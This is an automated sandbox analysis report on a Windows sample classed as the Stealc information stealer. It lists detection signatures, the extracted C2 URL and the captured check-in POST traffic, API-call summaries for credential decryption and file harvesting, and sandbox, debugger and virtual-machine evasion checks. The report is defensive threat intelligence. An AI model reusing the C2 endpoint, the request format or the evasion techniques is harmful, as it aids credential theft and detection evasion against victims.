Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522422
MD5:e3989af8cb5908ba300311259af23245
SHA1:0013081341d0faf8d7b9a9a20d75310d8b9c13fa
SHA256:665f8ded044e58e1900e7441cc75ebbc9438f9a6a0fde9528698dab670966203
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E3989AF8CB5908BA300311259AF23245)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6704JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6704JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.1000000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T02:01:09.384981+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.1000000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.php#Virustotal: Detection: 18%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0100C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_01009B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01007240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_01007240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01009AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_01009AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01018EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_01018EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01014910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_01014910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_010138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0100DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0100ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01014570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_01014570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0100E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0100DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0100BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01013EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_01013EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0100F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_010016D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 34 30 45 46 44 43 45 44 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"5E40EFDCED231817704571------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_01004880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 34 30 45 46 44 43 45 44 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"5E40EFDCED231817704571------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--
                Source: file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/$(
                Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/:(
                Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1779494572.00000000018F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
                Source: file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37m

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0168804E0_2_0168804E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_016880130_2_01688013
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013CF0BF0_2_013CF0BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D40920_2_013D4092
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D0BD40_2_013D0BD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D25B90_2_013D25B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013CD5890_2_013CD589
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C4DF20_2_013C4DF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013AFDC10_2_013AFDC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C84950_2_013C8495
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133FCC70_2_0133FCC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014547F80_2_014547F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01330EAC0_2_01330EAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D6FB0_2_0138D6FB
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 010045C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: exwozbij ZLIB complexity 0.9950333610938953
                Source: file.exe, 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_01019600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01013720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_01013720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Q2Y1P5WU.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1808384 > 1048576
                Source: file.exeStatic PE information: Raw size of exwozbij is bigger than: 0x100000 < 0x193600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.1000000.0.unpack :EW;.rsrc :W;.idata :W; :EW;exwozbij:EW;werwxfcu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;exwozbij:EW;werwxfcu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01019860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bac57 should be: 0x1c30f2
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: exwozbij
                Source: file.exeStatic PE information: section name: werwxfcu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01482152 push 671187EAh; mov dword ptr [esp], ebp0_2_014820C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01482152 push 5D451B19h; mov dword ptr [esp], ebp0_2_014821FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01446169 push esi; mov dword ptr [esp], 16DF2999h0_2_0144618E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01446169 push 614DB154h; mov dword ptr [esp], esi0_2_014461C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01446169 push eax; mov dword ptr [esp], 3BF7ED87h0_2_014461DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01446169 push 619522CAh; mov dword ptr [esp], eax0_2_01446213
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132011D push 450CD900h; mov dword ptr [esp], edi0_2_01320171
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132011D push 614FA981h; mov dword ptr [esp], ecx0_2_013201A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0143C17A push esi; mov dword ptr [esp], 7D3DE62Ch0_2_0143C19B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130D1BD push 0D1E0E46h; mov dword ptr [esp], ebp0_2_0130D1E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130D1BD push edi; mov dword ptr [esp], edx0_2_0130D20C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130D1BD push edi; mov dword ptr [esp], esi0_2_0130D260
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130D1BD push ebp; mov dword ptr [esp], esi0_2_0130D26F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130D1BD push esi; mov dword ptr [esp], eax0_2_0130D2C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130D1BD push ebx; mov dword ptr [esp], 32E4D61Dh0_2_0130D304
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130D1BD push 643A3B7Ch; mov dword ptr [esp], ebp0_2_0130D31B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013F41A5 push 2C7294B4h; mov dword ptr [esp], esp0_2_013F41C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013F399B push 22EFC150h; mov dword ptr [esp], ebp0_2_013F39B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013F399B push ebx; mov dword ptr [esp], ecx0_2_013F39E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126498C push 0CE04504h; mov dword ptr [esp], esp0_2_012683E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126498C push esi; mov dword ptr [esp], 00000004h0_2_012683F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DC99E push edx; mov dword ptr [esp], 37AB64A1h0_2_012DC9DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DC99E push edi; mov dword ptr [esp], ecx0_2_012DC9E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DC99E push 5933C81Ch; mov dword ptr [esp], esp0_2_012DCA73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DC99E push 6E45E1A2h; mov dword ptr [esp], eax0_2_012DCABD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DC99E push 1764F851h; mov dword ptr [esp], ecx0_2_012DCACD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_016881AB push 025C4831h; mov dword ptr [esp], esp0_2_016881C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_016881AB push ebx; mov dword ptr [esp], 41261073h0_2_0168820A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_016881AB push 41BD7126h; mov dword ptr [esp], eax0_2_016882B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_016881AB push ecx; mov dword ptr [esp], eax0_2_016882C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130E9E7 push 11A54283h; mov dword ptr [esp], edi0_2_0130EA05
                Source: file.exeStatic PE information: section name: exwozbij entropy: 7.953490732533179

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01019860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13290
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1262143 second address: 1262147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1262147 second address: 1262151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9844BC1D56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261A6E second address: 1261A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F98450EE8C6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8C0E second address: 13D8C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9844BC1D5Ch 0x00000008 jmp 00007F9844BC1D65h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8C34 second address: 13D8C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F98450EE8DCh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3BCB second address: 13D3BD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3BD1 second address: 13D3BD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3BD6 second address: 13D3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F9844BC1D5Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D822B second address: 13D8231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8231 second address: 13D8235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8235 second address: 13D8246 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8246 second address: 13D824A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
